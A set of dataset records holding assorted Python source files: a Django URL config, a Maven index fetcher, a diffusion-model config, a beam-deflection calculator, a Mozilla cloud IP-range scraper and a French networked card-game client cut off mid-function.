self.rel_embeddings, \"ent_size\":self.ent_size,\n \"REL_size\":self.REL_size, \"ent_clusters\":estimator.labels_}\n with open(\"clustering_and_embeddings.pkl\", \"wb\") as clt:\n pickle.dump(clustering_and_embeddings, clt)\n\nif __name__ == \"__main__\":\n collector = Collector()\n collector.cluster()","sub_path":"models_asynchronized/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"419553236","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexPageView.as_view(), name='index_view'),\n url(r'^chat/$', views.ChatView.as_view(), name='chat_view'),\n url(r'^message/send/$',\n views.MessageCreateView.as_view(), name='send_view'),\n url(r'^message/get$', views.MessagesView.as_view(), name='get_view'),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"549489829","text":"import os\nfrom typing import List\n\nfrom lxml import objectify\n\nfrom pymaven import repo\nfrom pymaven.artifact import Artifact\n\nmaster_index = \"master-index.xml\"\ngroup_index = \"group-index.xml\"\n\n\ndef fetch_master_index(_dest_dir: str) -> str:\n master_index_file = os.path.join(_dest_dir, master_index)\n\n repo.fetch_file(master_index, master_index_file, overwrite=True)\n\n return master_index_file\n\n\ndef parse_master_index(_file: str) -> List[str]:\n with open(_file) as f:\n # force utf-8, otherwise fromstring throws the following error\n # Unicode strings with encoding declaration are not supported\n xml_string = f.read().encode(\"utf-8\")\n\n xml_obj = objectify.fromstring(xml_string)\n\n return sorted(list(map(lambda x: x.tag, xml_obj.getchildren())))\n\n\ndef to_url_path(_group_id: str) -> str:\n return _group_id.replace(\".\", \"/\")\n\n\ndef fetch_group_index(_dest_root_dir: str, _group_id: str) -> str:\n print(\"fetching group: {}\".format(_group_id))\n\n _group_id_url = to_url_path(_group_id)\n\n _dest_dir = os.path.join(_dest_root_dir, _group_id_url)\n\n # ensure the destination dir exists\n os.makedirs(_dest_dir, exist_ok=True)\n\n group_index_file = os.path.join(_dest_dir, group_index)\n\n repo.fetch_file(_group_id_url + \"/\" + group_index, group_index_file, overwrite=True)\n\n return group_index_file\n\n\ndef parse_group_index(_file: str) -> List[Artifact]:\n print(\"parsing group: {}\".format(_file))\n\n with open(_file) as f:\n # force utf-8, otherwise fromstring throws the following error\n # Unicode strings with encoding declaration are not supported\n xml_string = f.read().encode(\"utf-8\")\n\n xml_obj = objectify.fromstring(xml_string)\n\n group_id = xml_obj.tag\n\n artifacts = []\n for artifact in xml_obj.getchildren():\n for version in artifact.attrib[\"versions\"].split(\",\"):\n artifacts.append(Artifact(group_id, artifact.tag, version))\n\n return artifacts\n","sub_path":"pymaven/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"238512155","text":"# Copyright (c) OpenMMLab. All rights reserved.\nfrom mmengine.config import read_base\n\nwith read_base():\n from .adm_ddim250_8xb32_imagenet_256x256 import *\n\nfrom mmagic.evaluation.metrics import FrechetInceptionDistance\nfrom mmagic.models.editors.guided_diffusion.classifier import EncoderUNetModel\n\nmodel.update(\n dict(\n classifier=dict(\n type=EncoderUNetModel,\n image_size=256,\n in_channels=3,\n model_channels=128,\n out_channels=1000,\n num_res_blocks=2,\n attention_resolutions=(8, 16, 32),\n channel_mult=(1, 1, 2, 2, 4, 4),\n use_fp16=False,\n num_head_channels=64,\n use_scale_shift_norm=True,\n resblock_updown=True,\n pool='attention')))\n\nmetrics = [\n dict(\n type=FrechetInceptionDistance,\n prefix='FID-Full-50k',\n fake_nums=50000,\n inception_style='StyleGAN',\n sample_model='orig',\n sample_kwargs=dict(\n num_inference_steps=250, show_progress=True, classifier_scale=1.))\n]\n\nval_evaluator = dict(metrics=metrics)\ntest_evaluator = dict(metrics=metrics)\n","sub_path":"mmagic/configs/guided_diffusion/adm-g_ddim25_8xb32_imagenet_256x256.py","file_name":"adm-g_ddim25_8xb32_imagenet_256x256.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"499122432","text":"#!/usr/bin/env python\n\n\"\"\"A Python program to calculate simple beam deflection with UDL\"\"\"\nimport math\n\n#Input Variables\nSpan=3.8 #m\n\nDeflection_limit = Span/360 #span/deflection limit\nE = 200000 #Mpa\nPhi_bending = 0.9\nf_sy=250 #MPa\n\n#DISTRIBUTED LOADS\nL_width=1.2 #m\nG = 1.5 #kPa\nQ = 1.5 #kPa\n\n\n#Convert Input to SI units\nG = G*1e3 #convert from kN to N\nQ = Q*1e3 #convert from kN to N\nE = E*1e6 #convert from MPa to Pa\nf_sy = f_sy *1e6 #convert from MPa to Pa\n\n#Check Service Deflection\nW_service = Span*L_width*(G+Q) #N\nIx_reqd = (5*W_service*Span**3)/(384*E*Deflection_limit)\n\n#Check Section Capacity\nW_ultimate = Span*L_width*(1.2*G+1.5*Q) #N\nM_ultimate = (W_ultimate*Span)/8 #N.m\nZx_required = M_ultimate/(Phi_bending*f_sy) #m^3\n\n#Convert results back to kN, mm^4 and mm^3\nIx_reqd = Ix_reqd*1e6 #convert to mm^4 *1e6\nZx_required = Zx_required *1e6 #convert to mm^3 *1e-3\nW_service = W_service*1e-3 # convert from N to kN\nW_ultimate = W_ultimate*1e-3 # convert from N to kN\n\n#Report Results\nprint ('Service Load (kN)=',W_service)\nprint ('Ix Required (mm^4 * 1e6)=',Ix_reqd)\nprint('Ultimate Load (kN)=', W_ultimate)\nprint ('Zx Required (mm^3 * 1e3)=',Zx_required)\n\n\n\n'''\nResults: Beam 10\nService Load (kN)= 13.679999999999998\nIx Required (mm^4 * 1e6)= 4.6298249999999985\nUltimate Load (kN)= 18.468\nZx Required (mm^3 * 1e3)= 38.988\n'''","sub_path":"Beams/Simple Beam.py","file_name":"Simple Beam.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"72440221","text":"#!/usr/bin/env python3\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n# This script provides data validation around the bloxtool CLI, which\n# retrieves Mozilla IP address ranges froma third party vendor. The\n# script runs as a recurring systemd task.\n\nimport ipaddress\nimport json\nimport logging\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\n\nimport dns.resolver\nimport requests\nfrom datadiff import diff\nfrom voluptuous import (\n All,\n Optional,\n Schema,\n Invalid as VoluptuousInvalid,\n truth,\n)\nfrom voluptuous.humanize import validate_with_humanized_errors\n\n\nformatter = logging.Formatter('%(name)s %(message)s')\nformatter.converter = time.gmtime\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(formatter)\nlogger = logging.getLogger('mozilla-ip-scraper')\nlogger.addHandler(handler)\n\n\ndef write_to_file_atomically(file_path: Path, content: str) -> None:\n '''Writes new data to a temp file, then renames the temp \n file to the existing filename'''\n temp_file_path = file_path.with_suffix('.tmp')\n with temp_file_path.open(mode='w') as temp_file:\n temp_file.write(content)\n\n temp_file_path.rename(file_path)\n\n@truth\ndef is_ip_address_network(value: str) -> bool:\n '''Validates if a given value (interpreted as a str) represents\n an IP address network'''\n try:\n # This call will raise a ValueError if value is not a valid ip address range\n ipaddress.ip_network(value, strict=True)\n return True\n\n except ValueError:\n return False\n\n@truth\ndef all_required_regions_exist(prefixes: list) -> bool:\n '''Validates that the set of all required regions is a subset\n of all the regions in the iterable of IP networks'''\n required_regions = {\n 'us-west-2',\n 'us-west-1',\n 'us-east-2',\n 'us-east-1',\n 'eu-central-1',\n }\n\n prefixes_in_new_document = {\n prefix_object['region']\n for prefix_object in prefixes\n }\n\n return required_regions <= prefixes_in_new_document\n\n\ndef get_mozilla_office_ips():\n '''Entry point for the Mozilla office IP scraper\n \n Calls out to bloxtool to obtain Mozilla network information\n in JSON format. Validates the JSON against a known schema and\n atomically re-writes a file with the CIDR representations of\n Mozilla office IP address spaces.\n '''\n try:\n mozilla_ip_ranges_file = Path('/var/hg/moz-ip-ranges.txt')\n bloxtool_config_file = Path('/etc/mercurial/bloxtool.ini')\n bloxtool_command = [\n '/var/hg/venv_tools/bin/bloxtool',\n 'network',\n 'search',\n 'attribute',\n 'subnet-purpose',\n 'value',\n 'nat-pool',\n '--format=json',\n f'--config={bloxtool_config_file}'\n ]\n\n bloxtool_json_schema = Schema([\n {\n 'comment': str,\n '_ref': str,\n 'network': is_ip_address_network,\n 'network_view': str,\n }\n ], extra=False, required=True)\n\n # Get raw string output and convert to Python dict\n process_output = subprocess.run(bloxtool_command, check=True, encoding='utf-8', stdout=subprocess.PIPE).stdout\n output_as_dict = json.loads(process_output)\n\n # Verify dict schema\n validate_with_humanized_errors(output_as_dict, bloxtool_json_schema)\n\n write_to_file_atomically(mozilla_ip_ranges_file, '\\n'.join(i['network'] for i in output_as_dict))\n\n\n except subprocess.CalledProcessError as cpe:\n logger.exception('An error occurred while executing the bloxtool command: exit code %s' % cpe.returncode)\n logger.exception('STDOUT: %s' % cpe.stdout)\n logger.exception('STDERR: %s' % cpe.stderr)\n sys.exit(1)\n\n except json.JSONDecodeError as jde:\n logger.exception('An error occurred parsing the bloxtool output as JSON: %s' % jde.msg)\n sys.exit(1)\n\n except VoluptuousInvalid as vi:\n logger.exception('The JSON data from bloxtool does not match the required schema.')\n logger.exception('Error message: %s' % vi.msg)\n logger.exception('Error path: %s' % vi.path)\n logger.exception('Exception message: %s' % vi.error_message)\n sys.exit(1)\n\n\ndef get_aws_ips():\n '''Entry point for the AWS IP address scraper\n \n Downloads the AWS IP ranges JSON document from Amazon and verifies against a\n known schema. Atomically rewrites a file with the CIDR representations of\n AWS IP address spaces.\n '''\n try:\n # Grab the new data from Amazon\n amazon_ip_ranges_file = Path('/var/hg/aws-ip-ranges.json')\n ip_ranges_response = requests.get('https://ip-ranges.amazonaws.com/ip-ranges.json')\n\n # Ensure 200 OK response code\n if ip_ranges_response.status_code != 200:\n sys.exit('HTTP response from Amazon was not 200 OK')\n\n # Sanity check: ensure the file is an appropriate size\n if len(ip_ranges_response.content) < 88000:\n sys.exit('The retrieved AWS JSON document is smaller than the minimum allowable file size')\n\n\n # JSON Schema for the Amazon IP Ranges JSON document\n amazon_json_schema = Schema({\n 'syncToken': str,\n 'createDate': str,\n 'ipv6_prefixes': [dict], # If IPv6 is supported in the future, this will need to be defined\n # The prefixes field must meet both requirements:\n # 1. There must be at least one entry for each region containing CI and S3 bundles\n # 2. Must be a list of dicts that fit the schema below\n 'prefixes': All(all_required_regions_exist, [\n {\n 'ip_prefix': is_ip_address_network,\n 'region': str,\n 'service': str,\n 'network_border_group': Optional(str),\n },\n ]),\n }, extra=False, required=True)\n\n\n # Validate dict schema\n output_as_dict = ip_ranges_response.json()\n validate_with_humanized_errors(output_as_dict, amazon_json_schema)\n\n # Sanity check: ensure the syncToken indicates an IP space change has been made\n # since the last recorded change. Only check if a file exists, in case of new deployments\n if amazon_ip_ranges_file.is_file():\n file_bytes = amazon_ip_ranges_file.read_bytes()\n existing_document_as_dict = json.loads(file_bytes)\n\n file_diff = diff(existing_document_as_dict, output_as_dict, context=0)\n\n # Exit if the file contents are the same or the syncToken has not changed\n if not file_diff or int(output_as_dict['syncToken']) <= int(existing_document_as_dict['syncToken']):\n sys.exit()\n\n else:\n existing_document_as_dict = {} # No existing document means whole file is the diff\n file_diff = diff(existing_document_as_dict, output_as_dict, context=0)\n\n\n write_to_file_atomically(amazon_ip_ranges_file, json.dumps(output_as_dict))\n\n # Print the diff for collection as systemd unit output\n logger.info('AWS IP ranges document has been updated')\n logger.info(file_diff)\n\n except subprocess.CalledProcessError as cpe:\n logger.exception('An error occurred when notifying about changes to the file: exit code %s' % cpe.returncode)\n logger.exception('STDOUT: %s' % cpe.stdout)\n logger.exception('STDERR: %s' % cpe.stderr)\n sys.exit(1)\n\n except json.JSONDecodeError as jde:\n logger.exception('An error occurred parsing the data retrieved from Amazon as JSON: %s' % jde.msg)\n sys.exit(1)\n\n except VoluptuousInvalid as vi:\n logger.exception('The JSON data from Amazon does not match the required schema.')\n logger.exception('Error message: %s' % vi.msg)\n logger.exception('Error path: %s' % vi.path)\n logger.exception('Exception message: %s' % vi.error_message)\n sys.exit(1)\n\n\ndef recursive_domain_query(dnsresolver: dns.resolver.Resolver, blocks: list, domain: str):\n '''Perform a DNS query for `domain`, which may return more subdomains\n which need to be queried.\n\n GCP advertises it's IP address blocks via TXT DNS records. The initial domain\n returns a list of subdomains to query. Those subdomains can contain IP address\n blocks, or further subdomains to query for more block lists.\n '''\n response = dnsresolver.query(domain, rdtype='txt')\n\n if len(response) != 1:\n logger.warn('Initial DNS query expected 1 result (actual: %d)' % len(response))\n\n # Parse each record in the response\n for item in response.rrset.items:\n for field in item.to_text().split(' '):\n if field.startswith('ip4:'):\n ip = field[len('ip4:'):]\n blocks.append(ip)\n elif field.startswith('include:'):\n subdomain = field[len('include:'):]\n recursive_domain_query(dnsresolver, blocks, subdomain)\n\n\ndef get_gcp_ips():\n '''Entry point for the AWS IP address scraper\n\n Queries GCP advertised DNS records to determine GCP public IP blocks and write them\n to disk.\n '''\n try:\n gcp_ip_ranges_file = Path('/var/hg/gcp-ip-ranges.txt')\n\n # Create a dns resolver that uses Google's nameservers\n # Not entirely necessary but since we're querying Google's\n # records it's probably not a bad idea\n dnsresolver = dns.resolver.Resolver()\n dnsresolver.nameservers = ['8.8.8.8', '8.8.4.4']\n\n blocks = []\n\n recursive_domain_query(dnsresolver, blocks, '_cloud-netblocks.googleusercontent.com')\n\n if not blocks:\n raise Exception('domain query returned no blocks')\n\n # Write to path atomically\n write_to_file_atomically(gcp_ip_ranges_file, '\\n'.join(blocks))\n\n except Exception as e:\n logger.exception('Error fetching GCP records: %s' % e)\n sys.exit(1)\n\n\n# Register possible commands\nCOMMANDS = {\n 'aws': get_aws_ips,\n 'gcloud': get_gcp_ips,\n 'moz-offices': get_mozilla_office_ips,\n}\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2 or sys.argv[1] not in COMMANDS:\n sys.exit('usage: {executable} <{possible_commands}>'\n .format(executable=sys.argv[0], possible_commands=' | '.join(COMMANDS.keys())))\n\n COMMANDS[sys.argv[1]]()\n sys.exit()\n","sub_path":"scripts/scrape-manifest-ip-ranges.py","file_name":"scrape-manifest-ip-ranges.py","file_ext":"py","file_size_in_byte":10572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"58134361","text":"#!/usr/bin/env python3\nimport socket, pickle, sys, json, os, random, time\nfrom player import Player\n\nDEBUG = False\n\nPACKET_SIZE = 1024\n\nSHOW_GAME = \"S\"\nMULLIGAN = \"0\"\nDRAW_CARD = \"1\"\nTAP_LAND = \"2\"\nPLAY_CARD = \"3\"\nUSE_EFFECT = \"4\"\nSELECT = \"5\"\nATTACK = \"6\"\nBLOCK = \"7\"\nSKIP_PHASE = \"8\"\nCONCEDE = \"9\"\n\nHUMAN = \"1\"\nBOT_RANDOM = \"2\"\nBOT_SKIP = \"3\"\n\nID = 0\nLIFE = 1\nMANA = 2\nDECK = 3\nHAND = 4\nBATTLE_ZONE = 5\nLAND_ZONE = 6\nGRAVEYARD = 7\nEXILE = 8\n\nSELECTION_PLAYER = 0\nSELECTION_DECK = 1\nSELECTION_HAND = 2\nSELECTION_BATTLEZONE = 3\nSELECTION_LANDZONE = 4\nSELECTION_GRAVEYARD = 5\nSELECTION_EXILE = 6\n\nTARGET_ID = 0\nTARGET_TYPE = 1\nTARGET_POSITION = 2\n\ndef main():\n\n\tclient = None\n\n\tclient = Client()\n\n\t# Connexion au serveur principal\n\tclient.connect_server()\n\n\t# Connexion au serveur de jeu\n\tclient.connect_game()\n\n\t# Lancement de la partie\n\tresult = client.play()\n\n\t# Affichage des résultats de la partie\n\tif(result == \"VICTORY\"):\n\n\t\tprint(\"Victory !\")\n\n\telif(result == \"DEFEAT\"):\n\n\t\tprint(\"Defeat.\")\n\n\telse:\n\n\t\tprint(\"Quelque chose has gone terribly mal (:\")\n\n\tinput(\"Appuyez sur ENTER pour quitter\")\n\n\t# Déconnexion du serveur\n\tclient.disconnect()\n\n\t# Nettoyage en sortie\n\tclient.clear_terminal()\n\nclass Client:\n\n\tdef __init__(self):\n\n\t\tself.__server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.__game_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.__server_netconfig = None\n\t\tself.__game_netconfig = None\n\t\tself.__player_id = -1\n\t\tself.__players = []\n\t\tself.__behaviour = \"\"\n\n\t\ttry:\n\t\t\twith open(\"JSON/ip_config.json\") as file:\n\t\t\t\tjson_string = json.load(file)\n\t\texcept Exception:\n\t\t\tsys.exit(\"Impossible d'ouvrir le fichier JSON\")\n\n\t\t# Récupération des informations réseaux du serveur\n\t\tself.__server_netconfig = (json_string['host_server'], int(json_string['port_server']))\n\n\t\t# Définition du timeout UDP\n\t\tself.__server_socket.settimeout(10.0)\n\n\tdef main_menu(self):\n\n\t\tmain_input = \"\"\n\t\tbehaviour_input = \"\"\n\n\t\twhile True:\n\n\t\t\tself.clear_terminal()\n\n\t\t\tprint(\"[ Nouvelle partie (1) ]\")\n\t\t\tprint(\"[ Rejoindre une partie (2) ]\")\n\t\t\tprint(\"[ Quitter (3) ]\")\n\n\t\t\tmain_input = input(\">\")\n\n\t\t\tif(main_input.isnumeric() and int(main_input) in range(1,4)):\n\n\t\t\t\t\tbreak\n\n\t\tif(int(main_input) in range(1,3)):\n\n\t\t\twhile True:\n\n\t\t\t\tself.clear_terminal()\n\n\t\t\t\tprint(\"HUMAN (1)\")\n\t\t\t\tprint(\"BOT_RANDOM (2)\")\n\t\t\t\tprint(\"BOT_SKIP (3)\")\n\n\t\t\t\tbehaviour_input = input(\">\")\n\n\t\t\t\tif(behaviour_input.isnumeric()):\n\n\t\t\t\t\tif(behaviour_input == HUMAN):\n\n\t\t\t\t\t\tself.__behaviour = \"HUMAN\"\n\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\telif(behaviour_input == BOT_RANDOM):\n\n\t\t\t\t\t\tself.__behaviour = \"BOT_RANDOM\"\n\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\telif(behaviour_input == BOT_SKIP):\n\n\t\t\t\t\t\tself.__behaviour = \"BOT_SKIP\"\n\n\t\t\t\t\t\tbreak\n\n\t\treturn main_input\n\n\tdef clear_terminal(self):\n\n\t\tcommand = \"clear\"\n\n\t\tif os.name == \"nt\":\n\t\t\tcommand = \"cls\"\n\n\t\tos.system(command)\n\n\tdef update(self, gamestate):\n\n\t\tfor player in gamestate:\n\n\t\t\tif(player[LIFE] != None):\n\n\t\t\t\tself.__players[player[ID]].set_life(player[LIFE])\n\n\t\t\tif(player[MANA] != None):\n\n\t\t\t\tself.__players[player[ID]].set_mana_pool(player[MANA])\n\n\t\t\tif(player[DECK] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_deck(player[DECK])\n\n\t\t\tif(player[HAND] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_hand(player[HAND])\n\n\t\t\tif(player[BATTLE_ZONE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_battle_zone(player[BATTLE_ZONE])\n\n\t\t\tif(player[LAND_ZONE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_land_zone(player[LAND_ZONE])\n\n\t\t\tif(player[GRAVEYARD] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_graveyard(player[GRAVEYARD])\n\n\t\t\tif(player[EXILE] != None):\n\n\t\t\t\tself.__players[player[ID]].get_board().set_exile(player[EXILE])\n\n\tdef send_action(self, action):\n\n\t\tserialized_data = None\n\n\t\t# Sérialisation\n\t\tserialized_data = pickle.dumps(action)\n\n\t\t# Envoi vers le serveur de jeu : Taille du segment (1)\n\t\tself.send_size(serialized_data)\n\n\t\t# Envoi vers le serveur de jeu : Segment (Requête d'action) (2)\n\t\tself.__game_socket.send(serialized_data)\n\t\t\n\t\tif(DEBUG):\n\t\t\tprint(\"REQUETE D'ACTION :\",action,\"(envoyé)\")\n\n\tdef send_size(self, segment):\n\n\t\tdata = \"\"\n\t\tserialized_data = None\n\n\t\t# Calcul de la taille du segment à envoyer passé en paramètre\n\t\tdata = '%16s' %len(segment)\n\n\t\t# Sérialisation\n\t\tserialized_data = data.encode()\n\n\t\t# Envoi vers le serveur de jeu : Taille du segment\n\t\tself.__game_socket.send(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(int(data),\"BYTES (envoyé)\")\n\n\tdef recv_signal(self):\n\n\t\tsize = 0\n\t\tserialized_data = None\n\t\tdata = \"\"\n\n\t\t# Réception depuis le serveur de jeu : Taille du segment (1)\n\t\tsize = self.recv_size()\n\n\t\t# Réception depuis le serveur de jeu : Signal (2)\n\t\tserialized_data = self.__game_socket.recv(size)\n\n\t\t# Désérialisation\n\t\tdata = pickle.loads(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(\"SIGNAL :\",data,\"(reçu)\")\n\n\t\treturn data\n\n\tdef recv_gamestate(self):\n\n\t\tsize = 0\n\t\tserialized_data = None\n\t\tdata = None\n\n\t\t# Réception depuis le serveur de jeu : Taille du segment (1)\n\t\tsize = self.recv_size()\n\n\t\t# Réception depuis le serveur de jeu : Gamestate (2)\n\t\tserialized_data = self.__game_socket.recv(size)\n\n\t\t# Désérialisation\n\t\tdata = pickle.loads(serialized_data)\n\n\t\tif(DEBUG):\n\t\t\tprint(\"GAMESTATE (reçu)\")\t\n\n\t\treturn data\t\n\n\tdef recv_size(self):\n\n\t\tdata = 0\n\t\tserialized_data = None\n\n\t\t# Réception depuis le client : Taille du segment (1)\n\t\tserialized_data = self.__game_socket.recv(16)\n\n\t\t# Désérialisation\n\t\tdata = int(serialized_data.decode())\n\n\t\tif(DEBUG):\n\t\t\tprint(data,\"BYTES (reçu)\")\n\n\t\treturn data\n\n\tdef disconnect(self):\n\n\t\tself.__game_socket.close()\n\t\tself.__server_socket.close()\n\n\tdef input(self, min_value, max_value):\n\n\t\tinput_value = -1\n\n\t\tif(self.__behaviour == \"HUMAN\"):\n\n\t\t\tinput_value = input(\">\")\n\n\t\telif(self.__behaviour == \"BOT_RANDOM\"):\n\n\t\t\tinput_value = random.randint(min_value,max_value)\n\n\t\t\t# time.sleep(0.25)\n\n\t\telif(self.__behaviour == \"BOT_SKIP\"):\n\n\t\t\tif(random.randint(0,10) > 2):\n\n\t\t\t\tinput_value = 8\n\n\t\t\telse:\n\n\t\t\t\tinput_value = 1\n\n\t\treturn str(input_value)\n\n\t# Connexion au serveur UDP\n\tdef connect_server(self):\n\n\t\tuser_input = \"\"\n\t\trequest = \"\"\n\t\traw_data = None\n\t\tdata = None\n\t\tserver_address = None\n\n\t\twhile True:\n\n\t\t\t# Menu principal\n\t\t\tuser_input = self.main_menu()\n\n\t\t\t# Rafraichissement de l'écran\n\t\t\tself.clear_terminal()\n\t\t\t\n\t\t\t# Demande de lancement d'une nouvelle partie\n\t\t\tif user_input == \"1\":\n\n\t\t\t\trequest = \"NEW_GAME\"\n\n\t\t\t\t# Envoi vers le serveur : requête initiale (1)\n\t\t\t\tself.__server_socket.sendto(request.encode(),self.__server_netconfig)\n\n\t\t\t\t# Réception depuis le serveur : réponse (2)\n\t\t\t\ttry:\n\n\t\t\t\t\traw_data,server_address = self.__server_socket.recvfrom(PACKET_SIZE)\n\t\t\t\t\tdata = pickle.loads(raw_data)\n\t\t\t\t\n\t\t\t\texcept socket.timeout:\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Temps d'attente dépassé\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint(\"Message reçu :\", data, \"de\", server_address)\n\n\t\t\t\tif(data[0] == \"ACCEPT\"):\n\t\t\t\t\t\n\t\t\t\t\tself.__game_netconfig = data[1]\n\t\t\t\t\tbreak\n\n\t\t\t\telif(data[0] == \"DECLINE\"):\n\n\t\t\t\t\tprint(data[1])\n\t\t\t\t\tcontinue\n\n\t\t\t# Demande de rejoindre une partie\n\t\t\telif user_input == \"2\":\n\n\t\t\t\trequest = \"JOIN_GAME\"\n\n\t\t\t\t# Envoi vers le serveur : requête initiale (1)\n\t\t\t\tself.__server_socket.sendto(request.encode(),self.__server_netconfig)\n\n\t\t\t\t# Réception depuis le serveur : réponse (2)\n\t\t\t\ttry:\n\n\t\t\t\t\traw_data,server_address = self.__server_socket.recvfrom(PACKET_SIZE)\n\t\t\t\t\tdata = pickle.loads(raw_data)\n\t\t\t\t\n\t\t\t\texcept socket.timeout:\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Temps d'attente dépassé\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint(\"Message reçu :\", data, \"de\", server_address)\n\n\t\t\t\tif(data[0] == \"ACCEPT\"):\n\t\t\t\t\t\n\t\t\t\t\tself.__game_netconfig = data[1]\n\t\t\t\t\tbreak\n\n\t\t\t\telif(data[0] == \"DECLINE\"):\n\n\t\t\t\t\tprint(data[1])\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# Demande de quitter\n\t\t\telif user_input == \"3\":\n\t\t\t\t\n\t\t\t\tsys.exit(0)\n\n\t# Connexion à la partie\n\tdef connect_game(self):\n\t\n\t\t# Connexion au serveur de jeu\n\t\tself.__game_socket.connect(self.__game_netconfig)\n\n\t\t# Réception depuis le serveur de jeu : ID Player (1)\n\t\tself.__player_id = int(self.recv_signal())\n\n\t\t# Réception depuis le serveur de jeu : Objet Player (2)\n\t\tself.__players = self.recv_gamestate()\n\n\tdef play(self):\n\n\t\tresult = \"\"\n\t\trequest = None\n\t\tresponse = None\n\t\tgamestate = None\n\n\t\twhile True:\n\n\t\t\t# Réception depuis le serveur de jeu : Signal (3)\n\t\t\tresponse = self.recv_signal()\n\n\t\t\tif(response == \"PLAY\"):\n\n\t\t\t\t# Choix de l'action\n\t\t\t\trequest = self.action_menu()\n\n\t\t\t\t# Envoi vers le serveur de jeu : Requête d'action (4)\n\t\t\t\tself.send_action(request)\n\n\t\t\t\t# Réception depuis le serveur de jeu : Acceptation / Refus (5)\n\t\t\t\tresponse = self.recv_signal()\n\n\t\t\t\t# En cas d'acceptation\n\t\t\t\tif(response == \"ACCEPT\"):\n\n\t\t\t\t\t# Réception depuis le serveur de jeu : Etat de la partie (6)\n\t\t\t\t\tgamestate = self.recv_gamestate()\n\n\t\t\t\t\t# Mise à jour des informations de jeu\n\t\t\t\t\tself.update(gamestate)\n\t\t\t\t\t\n\t\t\t\t\tif(DEBUG):\n\t\t\t\t\t\tprint(\"MAJ DE LA PARTIE\")\t\n\n\t\t\t\t# En cas de refus, on recommence\n\t\t\t\telif(response == \"DECLINE\"):\n\t\t\t\t\tcontinue\n\n\t\t\telif(response == \"GAME_UPDATE\"):\n\n\t\t\t\t# Réception depuis le serveur de jeu : Etat de la partie\n\t\t\t\tgamestate = self.recv_gamestate()\n\n\t\t\t\t# Mise à jour des informations de jeu\n\t\t\t\tself.update(gamestate)\n\t\t\t\t\n\t\t\t\tif(DEBUG):\n\t\t\t\t\tprint(\"MAJ DE LA PARTIE\")\n\n\t\t\telif(response == \"DEATH\"):\n\t\t\t\t\t\n\t\t\t\tresult = \"DEFEAT\"\n\t\t\t\t\n\t\t\t\tbreak\n\n\t\t\telif(response == \"VICTORY\"):\n\n\t\t\t\tresult = \"VICTORY\"\n\n\t\t\t\tbreak\n\n\t\treturn result\n\n\tdef action_menu(self):\n\n\t\tuser_input = \"\"\n\t\trequest = \"\"\n\t\ti = 0\n\t\tidentity = []\n\t\tselecting = True\n\n\t\tif(DEBUG):\n\t\t\tinput(\"[CLEAR SCREEN]\")\n\n\t\twhile True :\n\n\t\t\t# Rafraichissement de l'écran\n\t\t\tself.clear_terminal()\n\n\t\t\t# Affichage initial\n\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\tprint(\"[ SHOW_GAME (S) ]\")\n\t\t\tprint(\"[ MULLIGAN (0) ]\")\n\t\t\tprint(\"[ DRAW_CARD (1) ]\")\n\t\t\tprint(\"[ TAP_LAND (2) ]\")\n\t\t\tprint(\"[ PLAY_CARD (3) ]\")\n\t\t\tprint(\"[ USE_EFFECT (4) ]\")\n\t\t\tprint(\"[ SELECT (5) ]\")\n\t\t\tprint(\"[ ATTACK (6) ]\")\n\t\t\tprint(\"[ BLOCK (7) ]\")\n\t\t\tprint(\"[ SKIP_PHASE (8) ]\")\n\t\t\tprint(\"[ CONCEDE (9) ]\")\n\n\t\t\t# Récupération de l'entrée utilisateur\n\t\t\tuser_input = self.input(0,8)\n\n\t\t\tif(user_input == SHOW_GAME):\n\n\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\tself.clear_terminal()\n\n\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\tprint(\"Player\", player.get_id(), \"-\", player.get_life(), \"HP - Deck :\", len(player.get_board().get_deck().get_cards()))\n\t\t\t\t\tprint(player.get_mana_pool())\n\n\t\t\t\t\tfor card in player.get_board().get_hand():\n\t\t\t\t\t\t\n\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\t\tfor card in 